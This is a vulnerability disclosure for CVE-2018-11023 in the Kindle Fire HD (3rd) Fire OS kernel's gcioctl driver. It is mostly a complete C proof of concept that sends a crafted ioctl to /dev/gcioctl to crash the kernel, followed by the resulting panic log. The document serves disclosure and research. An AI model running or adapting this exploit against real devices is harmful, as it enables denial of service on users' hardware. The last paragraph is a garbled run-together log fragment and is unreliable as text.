(CVE-2018-11023) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

1. Vulnerability overview

The kernel module omap/drivers/misc/gcx/gcioctl/gcif.c in the kernel of Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 allows an attacker to inject a crafted argument through the argument of an ioctl on the device /dev/gcioctl with command 3222560159 (0xC0145D9F), causing a kernel crash.

2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

PoC

```c
/* This is PoC of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/gcioctl causes the system crash via IOCTL 3222560159.
 * This PoC should run with permission to do ioctl on /dev/gcioctl.
 */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

static const char *driver = "/dev/gcioctl";
static unsigned int command = 3222560159u;   /* 0xC0145D9F */

int main(int argc, char *argv[], char *envp[])
{
    /* Four argument words; the second one (0x1a03e6ef) is the value that shows up in r7 in the crash log. */
    unsigned int payload[] = { 0x244085aa, 0x1a03e6ef, 0x000003f4, 0x00000000 };
    int fd = open(driver, O_RDONLY);
    if (fd < 0) {
        perror(driver);      /* the original PoC wrote its error to /data/local/tmp/log here */
        return -1;
    }
    printf("Try open %s with command 0x%x.\n", driver, command);
    printf("System will crash and reboot.\n");
    if (ioctl(fd, command, &payload) < 0) {
        perror("ioctl");     /* likewise logged to /data/local/tmp/log in the original */
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}
```

Crash log

```text
[   79.825592] init: untracked pid 3232 exited
[   79.830841] init: untracked pid 3234 exited
[   95.970855] Alignment trap: not handling instruction e1953f9f at [...]
[   95.978912] Unhandled fault: alignment exception (0001) at 0x1a03e6[...]
[   95.986053] Internal error: : 1 [#1] PREEMPT SMP ARM
[   95.991638] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[   95.999145] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[   96.006408] PC is at _raw_spin_lock_irqsave+0x38/0xb0
[   96.012115] LR is at _raw_spin_lock_irqsave+0x10/0x14
[   96.017791] pc : [...]    lr : [...]    psr: 20000093
[   96.017822] sp : d02bfdd8  ip : d02bfdf8  fp : d02bfdf4
[   96.030578] r10: 00000000  r9 : dd3eeca8  r8 : 00000001
[   96.036376] r7 : 1a03e6ef  r6 : 00000001  r5 : 1a03e6f3  r4 : d02be000
[   96.043701] r3 : 00000001  r2 : 00000001  r1 : 00000082  r0 : 200000[...]
[   96.050933] Flags: nzCv  IRQs off  FIQs on  Mode SVC_32  ISA ARM  Segment user
[   96.058990] Control: 10c5387d  Table: 96cb804a  DAC: 00000015
...
[   96.691162] Process gcioctl_poc_3 (pid: 3395, stack limit = 0xd02be2f8)
[   96.698455] Stack: (0xd02bfdd8 to 0xd02c0000)
...
[   96.867340] Backtrace:
[   96.870330] (_raw_spin_lock_irqsave+0x0/0xb0) from (_raw_spin_lock_irqsave+0x10/0x14)
[   96.881591]  r6:d02be000 r5:1a03e6f3 r4:00000082 r3:0000020a
[   96.888488] (_raw_spin_lock_irqsave+0x0/0x14) from (_raw_spin_lock_irq+0x10/0x14)
[   96.899291] (_raw_spin_lock_irq+0x0/0x14) from (wait_for_common+0x28/0x150)
[   96.909729] (wait_for_common+0x0/0x150) from (wait_for_completion_interruptible_timeout+0x14/0x18)
[   96.922149] (wait_for_completion_interruptible_timeout+0x0/0x18) from (dev_ioctl+0x7ec/0x10c4)
[   96.934204] (dev_ioctl+0x0/0x10c4) from (do_vfs_ioctl+0x8c/0x5b4)
[   96.943481] (do_vfs_ioctl+0x0/0x5b4) from (sys_ioctl+0x74/0x84)
[   96.952636] (sys_ioctl+0x0/0x84) from (ret_fast_syscall+0x0/0x30)
[   96.961822]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e54 r4:bed24638
[   96.970153] Code: e5843004 e10f0000 f10c0080 e1953f9f (e3330000)
[   96.977264] Board Information:
[   96.977264] Revision : 0001
[   96.977294] Serial: 0000000000000000
[   96.977294] SoC Information:
[   96.977294] CPU: OMAP4470
[   96.977294] Rev: ES1.0
[   96.977325] Type : HS
[   96.977325] Production ID: 0002B975-000000CC
[   96.977325] Die ID: 1CC60000-50002FFF-0B00935D-11007004
[   97.013824] ---[ end trace 2432291f2b5d99ba ]---
[   97.019195] Kernel panic - not syncing: Fatal exception
[   97.025024] CPU1: stopping
[   97.028137] Backtrace:
...
[   97.289581] Restarting Linux version 3.4.83-gd2afc0bae69 (build14-usela-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
```
38、9)0xc003ee5497.246826 CPUl PC (0)0xc0019b2c97.251007 CPUl PC (1)0xc0019b2c97.255065 CPUl PC (2)0c0019b2c97.259124 CPUl PC (3)0c0019b2c97.263183 CPUl PC (4)0c0019b2c97.267364 CPUl PC (5)0xc0019b2c97.271423 CPUl PC (6)0xc0019b2c97.275482 CPUl PC (7)0xc0019b2c97.279693 CPUl PC (8)0xc0019b2c97.283752 CPUl PC (9)0xc0019b2c97.28781197.289581 Restarting Linux version 3.4.83-gd2afc0bae69 (build14-usela-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 201797.289611